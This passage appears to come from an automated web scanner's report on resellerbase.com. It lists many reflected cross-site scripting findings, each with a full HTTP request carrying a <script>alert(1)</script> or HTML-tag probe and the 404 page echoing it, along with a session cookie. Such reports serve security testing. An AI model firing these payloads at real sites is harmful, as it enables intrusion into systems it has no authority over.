The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31005<script>alert(1)</script>5942e40aab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/0.gif?31005<script>alert(1)</script>5942e40aab8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/0.gif?31005<script>alert(1)</script>5942e40aab8=1 was not found on this server.</p>
...[SNIP]...

2.268. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0d9<script>alert(1)</script>f6a6f3be497 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultba0d9<script>alert(1)</script>f6a6f3be497/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultba0d9<script>alert(1)</script>f6a6f3be497/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.269. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd177<script>alert(1)</script>4b95502feeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingcd177<script>alert(1)</script>4b95502feeb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingcd177<script>alert(1)</script>4b95502feeb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.270. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 25147<script>alert(1)</script>d9eed647b90 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes25147<script>alert(1)</script>d9eed647b90/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes25147<script>alert(1)</script>d9eed647b90/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.271. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26d54<script>alert(1)</script>7df46541d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos26d54<script>alert(1)</script>7df46541d1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos26d54<script>alert(1)</script>7df46541d1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.272. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7013<script>alert(1)</script>7d27e23178d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesf7013<script>alert(1)</script>7d27e23178d/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesf7013<script>alert(1)</script>7d27e23178d/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.273. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 19bb5<script>alert(1)</script>a7ee12cf09c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review19bb5<script>alert(1)</script>a7ee12cf09c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review19bb5<script>alert(1)</script>a7ee12cf09c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.274. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3cf30<script>alert(1)</script>15a586871d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php3cf30<script>alert(1)</script>15a586871d2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php3cf30<script>alert(1)</script>15a586871d2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.275. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c839d<a>14c9e0990d2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc839d<a>14c9e0990d2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc839d<a>14c9e0990d2&opt=2 was not found on this server.</p>
...[SNIP]...

2.276. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ce11d<a>3a9ea53d457 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...ce11d<a>3a9ea53d457&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...ce11d<a>3a9ea53d457&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.277. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b62be<script>alert(1)</script>fd62e23d993 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&b62be<script>alert(1)</script>fd62e23d993=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&b62be<script>alert(1)</script>fd62e23d993=1 was not found on this server.</p>
...[SNIP]...

2.278. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b1982<a>1b56b5dc871 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2b1982<a>1b56b5dc871 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2b1982<a>1b56b5dc871 was not found on this server.</p>
...[SNIP]...

2.279. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b7bde<script>alert(1)</script>2a2f4ef5169 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultb7bde<script>alert(1)</script>2a2f4ef5169/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultb7bde<script>alert(1)</script>2a2f4ef5169/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.280. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe01d<script>alert(1)</script>deba8336341 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingfe01d<script>alert(1)</script>deba8336341/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingfe01d<script>alert(1)</script>deba8336341/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.281. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70fa6<script>alert(1)</script>07ca63c3e19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes70fa6<script>alert(1)</script>07ca63c3e19/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes70fa6<script>alert(1)</script>07ca63c3e19/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.282. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 251d8<script>alert(1)</script>7a3394b2bfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos251d8<script>alert(1)</script>7a3394b2bfa/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos251d8<script>alert(1)</script>7a3394b2bfa/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.283. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c11e8<script>alert(1)</script>83134e48169 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesc11e8<script>alert(1)</script>83134e48169/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesc11e8<script>alert(1)</script>83134e48169/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.284. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92b5d<script>alert(1)</script>a21e752ed40 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php92b5d<script>alert(1)</script>a21e752ed40?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
